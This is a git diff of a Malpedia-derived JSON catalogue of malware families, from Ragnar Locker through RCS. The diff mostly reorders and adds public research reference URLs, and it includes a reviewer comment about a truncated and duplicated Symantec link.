"https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/", + "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information", + "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/", + "https://www.ic3.gov/Media/News/2022/220307.pdf", + "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", - "https://securelist.com/targeted-ransomware-encrypting-data/99255/" + 
"https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", + "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/", + "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/", + "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.acronis.com/en-sg/articles/ragnar-locker/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", + 
"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html", + "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/" ], "synonyms": [], "type": [] @@ -40027,14 +41919,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3" ], "synonyms": [], "type": [] 
@@ -40047,14 +41939,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", "https://www.youtube.com/watch?v=GfbxHy6xnbA", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", "https://www.mandiant.com/resources/unc2452-merged-into-apt29", - "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515" + "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf" ], "synonyms": [], "type": [] 
@@ -40080,10 +41972,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2017-02-15-the-rambo-backdoor.md", - "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf", "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html", - "https://www.secureworks.com/research/threat-profiles/bronze-overbrook" + "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2017-02-15-the-rambo-backdoor.md" ], "synonyms": [ "brebsd" 
@@ -40110,30 +42002,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", - "https://www.youtube.com/watch?v=l6ZunH6YG0A", - "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", - "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", - "https://artik.blue/malware4", - "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", - "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", - "https://redcanary.com/resources/webinars/deep-dive-process-injection/", - "https://muha2xmad.github.io/unpacking/ramnit/", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://research.checkpoint.com/ramnits-network-proxy-servers/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/", - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-fairfax", "https://www.youtube.com/watch?v=N4f2e8Mygag", - "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", - "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", - "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", - 
"https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://research.checkpoint.com/ramnits-network-proxy-servers/", + "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", + "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", + "https://muha2xmad.github.io/unpacking/ramnit/", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", + "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/", + "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", + "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", + "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://artik.blue/malware4", + "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", + "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "http://www.secureworks.com/research/threat-profiles/gold-fairfax" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", + "https://www.youtube.com/watch?v=l6ZunH6YG0A", + 
"https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf" ], "synonyms": [ "Nimnul" @@ -40148,13 +42040,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay", - "https://www.youtube.com/watch?v=SKIu4LqMrns", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/", "https://www.antiy.cn/research/notice&report/research_report/20200522.html", - "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/" + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", + "https://www.youtube.com/watch?v=SKIu4LqMrns", + "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", + "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] 
@@ -40167,13 +42059,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", + "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", + "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", "https://bin.re/blog/the-dga-of-ranbyus/", + "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", - "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", - "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", - "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf", - "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" + "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf" ], "synonyms": [], "type": [] 
@@ -40225,34 +42117,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://github.com/Bleeping/Ransom.exx", - "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", + "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", + "https://www.ic3.gov/Media/News/2021/211101.pdf", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", - "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://github.com/Bleeping/Ransom.exx", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", "https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701", "https://www.youtube.com/watch?v=qxPXxWMI2i4", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", - 
"https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", - "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", - "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", + 
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.sentinelone.com/anthology/ransomexx/", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx" + "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "Defray777", @@ -40268,8 +42161,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", - "https://forum.malekal.com/viewtopic.php?t=36485&start=", - "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2" + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", + "https://forum.malekal.com/viewtopic.php?t=36485&start=" ], "synonyms": [ "WinLock" @@ -40297,11 +42190,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://twitter.com/malwrhunterteam/status/997748495888076800", "https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://twitter.com/malwrhunterteam/status/977275481765613569", - "https://twitter.com/malwrhunterteam/status/997748495888076800" + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://www.youtube.com/watch?v=LUxOcpIRxmg" ], "synonyms": [], "type": [] 
@@ -40337,7 +42230,7 @@ "value": "Rarog" }, { - "description": "This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", + "description": "This ransomware encrypts all user\u2019s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", 
@@ -40354,20 +42247,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin", - "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/", - "https://unit42.paloaltonetworks.com/unsigned-dlls/", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis", + "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/", + "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", + "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", "https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe", "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html", - "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://redcanary.com/blog/raspberry-robin/", + "https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks", + "https://unit42.paloaltonetworks.com/unsigned-dlls/", "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices", "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm", - "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", - 
"https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks" + "https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/" ], "synonyms": [ "LINK_MSIEXEC", @@ -40384,16 +42278,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0", - "https://content.fireeye.com/apt/rpt-apt38", "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://content.fireeye.com/apt/rpt-apt38", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", - "https://twitter.com/PhysicalDrive0/status/828915536268492800", - "https://www.secureworks.com/research/threat-profiles/nickel-gladstone" + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://community.broadcom.com/symantecenterprise/viewdocument/attackers-target-dozens-of-global-b" ], "synonyms": [ "QUICKRIDE" 
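Review bot: The reference added at the end of the win.ratankba refs, `https://community.broadcom.com/symantecenterprise/viewdocument/attackers-target-dozens-of-global-b`, looks truncated (the slug stops at `global-b`, presumably mid-way through "global-banks"), so it probably does not resolve to the Symantec post it is meant to preserve; please confirm it loads before merging, or replace it with the complete Broadcom library URL or a web.archive.org snapshot of the original `https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware` post. With this addition the entry now carries three variants of what appears to be the same Symantec article (`...new-malware`, `...new-malware-0` and the Broadcom link), and the two Symantec Connect URLs are likely dead since that host was retired, which leaves analysts following this cluster with no working source for the attribution. Since this cluster is generated from Malpedia, the durable fix belongs upstream in the Malpedia entry or in the generator's reference normalisation rather than in a hand edit of this file.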
@@ -40408,6 +42304,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos", + "https://securelist.com/lazarus-under-the-hood/77908/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "http://blog.trex.re.kr/3" ], @@ -40424,9 +42321,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel", + "https://github.com/FrenchCisco/RATel", "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://github.com/FrenchCisco/RATel" + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/" ], "synonyms": [], "type": [] @@ -40439,8 +42336,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif", - "https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html" ], "synonyms": [], "type": [] @@ -40453,9 +42350,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite", + "https://www.youtube.com/watch?v=fevGZs0EQu8", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", - "https://www.youtube.com/watch?v=fevGZs0EQu8" + "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], "synonyms": [], "type": [] 
@@ -40495,17 +42392,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", - "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", - "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", - "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf", - "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf", - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/" + "https://www.f-secure.com/documents/996508/1030745/callisto-group", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", + "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", + "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html" ], "synonyms": [ "Crisis", 
@@ -40548,8 +42445,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf",
- "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/",
- "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/"
+ "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
+ "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/"
],
"synonyms": [
"GREYSTUFF"
@@ -40564,10 +42461,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
